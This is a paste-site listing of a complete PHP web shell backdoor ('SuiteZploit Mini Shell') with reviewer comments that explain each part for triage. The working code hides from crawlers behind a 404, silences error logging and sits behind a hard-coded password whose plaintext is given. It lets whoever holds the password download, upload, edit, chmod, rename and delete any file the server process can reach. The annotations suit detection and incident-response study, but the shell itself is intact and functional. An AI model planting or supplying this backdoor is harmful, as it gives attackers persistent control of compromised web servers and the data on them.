Atsal

Untitled

Jan 5th, 2019
<?php
///////////////////////////////////////////////////////////////////////
// SuiteZploit Mini Shell Backdoor //
// Coder : A7SL //
// Version : 1.1 //
// Team : SuiteZploit //
// Site : https://www.suitezploit.me/ //
// Facebook : https://www.facebook.com/atsal.go.id //
///////////////////////////////////////////////////////////////////////
// NOTE(review): the banner above self-identifies this file as a web shell
// backdoor. The annotations added below describe what each part does so the
// sample can be triaged and matched against file-system and access-log
// evidence; no code has been changed.

// Session is used further down to remember that the password was accepted.
session_start();
// Error reporting, on-screen display and error logging are all switched off
// and the execution time limit is lifted, so failures caused by this script
// are neither shown nor written to the PHP error log.
error_reporting(0);
set_time_limit(0);
// Legacy call from the PHP 5 era, prefixed with the @ suppression operator.
@set_magic_quotes_runtime(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
// Hard-coded, unsalted MD5 digest that the posted password is compared with
// in the login gate; the plaintext is given by the author's own comment.
// The literal digest is a static indicator usable when scanning web roots.
$auth_pass = "b43f8c3c30ea0a3ef2f7bbcab1326ff7"; // pw : suitezploit
// The five settings below are assigned but not read anywhere in this listing.
// NOTE(review): the names ($auth_pass, $default_action = 'FilesMan', ...) look
// like the configuration header of the widely copied WSO shell family --
// presumably carried over from there; confirm against known samples.
$errorforbidden = $_SERVER['REQUEST_URI'];
$color = "#00ff00";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'UTF-8';
// Cloaking: when the User-Agent matches one of these crawler/library names
// (case-insensitive regex alternation), the script answers with a 404 status
// and stops, so those clients never see the login page. A scanner that
// identifies itself with one of these strings will therefore get a 404 for
// this file even though it exists.
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
  33.  
/**
 * Prints the password prompt page and terminates the request.
 *
 * Called by the login gate when the session carries no "authenticated" flag
 * and no matching password was posted. Emits a minimal HTML page whose only
 * control is a password field named "pass" in a form that POSTs back to the
 * same URL, then calls exit so nothing after the gate runs.
 *
 * Takes no parameters and never returns (ends in exit).
 */
function login_shell() {
?>
<?php
// Assigned but not used inside this function.
$errorforbidden = $_SERVER['REQUEST_URI'];
// Login form markup: a single password input, styled white-on-white by the
// inline <style> rule, with no submit button and no action attribute (the
// form posts to the current URL).
$masuk = '<style> input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
<center><form method="post"><input type="password" name="pass"></form></center>';
?>
<html>
<head>
<title>Shellnya Orang Ganteng</title>
<style type="text/css">
html {
margin: 20px auto;
background: #24292D;
color: white;
text-align: center;
}
header {
color: white;
margin: 10PX auto;
}
input[type=password] {
width: 200px;
height: 25px;
color: green;
background: #24292D;
border: 1px;
padding: 5px;
margin-left: 20px;
text-align: center;
}
</style>
</head>
<center>
<br><br><br>
<?php print $masuk; ?>
<?php
// Stop here: unauthenticated requests never reach the file-manager code.
exit;
}
// Login gate. The "authenticated" marker is a session entry whose key is
// md5() of the Host header. When it is absent, access is granted if
// $auth_pass is empty or if md5() of the posted "pass" field equals
// $auth_pass; otherwise login_shell() prints the prompt and exits.
// The if/if/else below has no braces: the else belongs to the inner if.
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
login_shell();
// File download handler: a GET request carrying file=<path> and act=download
// streams that path back as an attachment. The path is taken from the query
// string as-is, with no restriction to any directory, so any file the PHP
// process can read can be retrieved. In access logs this shows up as GET
// requests to this script with "act=download" in the query string.
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
@ob_clean();
$file = $_GET['file'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
// Page shell for the authenticated view: static HTML head, inline CSS and the
// "SuiteZploit" heading. The page title and heading text are fixed strings.
echo '<!DOCTYPE HTML>
<html>
<head>
<link href="" rel="stylesheet" type="text/css">
<title>SuiteZploit Mini Shell</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #24292D;
color:white;
}
background-color: #24292D;
color:white;
}
input type=submit {
background: #8C9696;
color: white;
}
#content tr:hover{
background-color: #8C9696;
color:white;
}
#content .first{
background-color: #8C9696;
color:white;
}
table{
border: 1px #000000 dotted;
}
a{
color:white;
text-decoration: none;
}
a:hover{
color:white;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head>
<body>
<h1><center><font color="white">SuiteZploit</font></center></h1>
<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td><font color="white"><center></font> ';
// Working directory: taken verbatim from the "path" query parameter when
// present, otherwise the script's current directory. Nothing confines it to
// the web root, so the whole file system visible to PHP can be browsed.
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
// Normalise Windows separators, then split into segments for the breadcrumb.
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
 
// Breadcrumb: one link per path segment, each pointing at ?path=<prefix up to
// that segment>. Segments are echoed without HTML escaping.
foreach($paths as $id=>$pat){
// A leading empty segment means an absolute path: emit the root link.
if($pat == '' && $id == 0){
// $a is set here but not read anywhere in this listing.
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
// Upload handler: a multipart POST with a part named "file" is copied from
// PHP's temporary upload location into the directory currently selected by
// $path, under the file name supplied by the client. Neither the name nor
// the content type is checked, and copy() is used rather than
// move_uploaded_file(). On a compromised host this is the code path that
// drops further files next to the shell.
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<center>';
echo '<font color="green">Success</font><br />';
}else{
echo '<font color="red">Failed</font><br/>';
}
}
// Upload form; it has no action attribute, so it posts to the current URL
// (including the current ?path=... query string).
echo '<form enctype="multipart/form-data" method="POST">
<font color="white"><center></font> <input type="file" name="file" />
<input type="submit" value="upload" />
</form>';
echo '</td></tr>';
// Request dispatch for the file manager. Three mutually exclusive branches:
//   1. ?filesrc=<path>                    -> show a file's contents
//   2. ?option with POST opt != delete    -> chmod / rename / edit forms
//   3. everything else                    -> optional delete, then listing
// All target paths come straight from the request ($_GET / $_POST) and are
// passed to the file-system functions without any restriction.
if(isset($_GET['filesrc'])){
// File viewer: prints the requested path (unescaped) and the file contents
// (HTML-escaped) for any file readable by the PHP process.
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
// Per-entry operations posted from the listing forms. The target is the
// POSTed "path" field, echoed back here without escaping.
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
// chmod: applied only once the "perm" field is posted; the form is
// pre-filled with the last four octal digits of the current mode.
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="green">Success</font><br/>';
}else{
echo '<font color="red">Failed</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'rename'){
// rename: moves the POSTed path to <current directory>/<newname>.
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="green">Success</font><br/>';
}else{
echo '<font color="red">Failed</font><br />';
}
// Keep the form's name field in sync with the new name.
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'edit'){
// edit: when "src" is posted the target is opened in 'w' mode (truncating
// it) and overwritten with the posted text, i.e. any file writable by the
// PHP process can be replaced. Modified timestamps on application files
// are the corresponding file-system artefact.
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="green">Success</font><br/>';
}else{
echo '<font color="red">Failed</font><br/>';
}
fclose($fp);
}
// Editor form pre-filled with the file's current (HTML-escaped) contents.
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Save" />
</form>';
}
echo '</center>';
}else{
echo '</table><br/><center>';
// delete: removes the POSTed path with rmdir() or unlink() depending on the
// POSTed "type" field, then falls through to the directory listing.
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="green">Success</font><br/>';
}else{
echo '<font color="red">Failed </font><br/>';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="green">Success</font><br/>';
}else{
echo '<font color="red">Failed</font><br/>';
}
}
}
echo '</center>';
// Directory listing of $path: sub-directories first, then regular files.
$scandir = scandir($path);
echo '<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</peller></center></td>
<td><center>Size</peller></center></td>
<td><center>Permission</peller></center></td>
<td><center>Modify</peller></center></td>
</tr>';
 
// Pass 1: directories (skipping "." and ".."). Each row links to
// ?path=<dir> and carries a form posting opt/type/name/path to
// ?option&path=<current directory>.
foreach($scandir as $dir){
if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
echo '<tr>
<td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
<td><center>--</center></td>
<td><center>';
// Permission string from perms(), coloured green when writable and red
// when unreadable.
if(is_writable($path.'/'.$dir)) echo '<font color="green">';
elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
echo perms($path.'/'.$dir);
if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
 
echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="'.$dir.'">
<input type="hidden" name="path" value="'.$path.'/'.$dir.'">
<input type="submit" value=">">
</form></center></td>
</tr>';
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
// Pass 2: regular files. Size is shown in KB (3 decimals) or, from 1024 KB
// upwards, in MB (2 decimals). Each row links to ?filesrc=<file> and offers
// the same operations as directories plus "edit".
foreach($scandir as $file){
if(!is_file($path.'/'.$file)) continue;
$size = filesize($path.'/'.$file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}
 
echo '<tr>
<td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
<td><center>'.$size.'</center></td>
<td><center>';
if(is_writable($path.'/'.$file)) echo '<font color="green">';
elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
echo perms($path.'/'.$file);
if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="'.$file.'">
<input type="hidden" name="path" value="'.$path.'/'.$file.'">
<input type="submit" value=">">
</form></center></td>
</tr>';
}
echo '</table>
</div>';
}
// Logout link: reloads the current directory view with go=xxnx appended.
echo "<font color='red'><br><tr><center><a href='?path=$path&go=xxnx'>Logout</a></center></font>";
echo '</body>
</html>';
// Logout handler: on go=xxnx the session's "authenticated" entry (keyed by
// md5 of the Host header) is removed and a 3-second meta refresh is emitted,
// after which the login gate shows the password prompt again. This output is
// written after the closing </html> tag, and the <form> opened here is never
// closed in this listing.
if($_GET['go'] == 'xxnx') {


echo '<form action="" method="post">';
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo '<meta http-equiv="refresh" content="3" />';
}
  330. function perms($file){
  331. $perms = fileperms($file);
  332.  
  333. if (($perms & 0xC000) == 0xC000) {
  334. // Socket
  335. $info = 's';
  336. } elseif (($perms & 0xA000) == 0xA000) {
  337. // Symbolic Link
  338. $info = 'l';
  339. } elseif (($perms & 0x8000) == 0x8000) {
  340. // Regular
  341. $info = '-';
  342. } elseif (($perms & 0x6000) == 0x6000) {
  343. // Block special
  344. $info = 'b';
  345. } elseif (($perms & 0x4000) == 0x4000) {
  346. // Directory
  347. $info = 'd';
  348. } elseif (($perms & 0x2000) == 0x2000) {
  349. // Character special
  350. $info = 'c';
  351. } elseif (($perms & 0x1000) == 0x1000) {
  352. // FIFO pipe
  353. $info = 'p';
  354. } else {
  355. // Unknown
  356. $info = 'u';
  357. }
  358.  
  359. // Owner
  360. $info .= (($perms & 0x0100) ? 'r' : '-');
  361. $info .= (($perms & 0x0080) ? 'w' : '-');
  362. $info .= (($perms & 0x0040) ?
  363. (($perms & 0x0800) ? 's' : 'x' ) :
  364. (($perms & 0x0800) ? 'S' : '-'));
  365.  
  366. // Group
  367. $info .= (($perms & 0x0020) ? 'r' : '-');
  368. $info .= (($perms & 0x0010) ? 'w' : '-');
  369. $info .= (($perms & 0x0008) ?
  370. (($perms & 0x0400) ? 's' : 'x' ) :
  371. (($perms & 0x0400) ? 'S' : '-'));
  372.  
  373. // World
  374. $info .= (($perms & 0x0004) ? 'r' : '-');
  375. $info .= (($perms & 0x0002) ? 'w' : '-');
  376. $info .= (($perms & 0x0001) ?
  377. (($perms & 0x0200) ? 't' : 'x' ) :
  378. (($perms & 0x0200) ? 'T' : '-'));
  379.  
  380. return $info;
  381. }
  382. ?>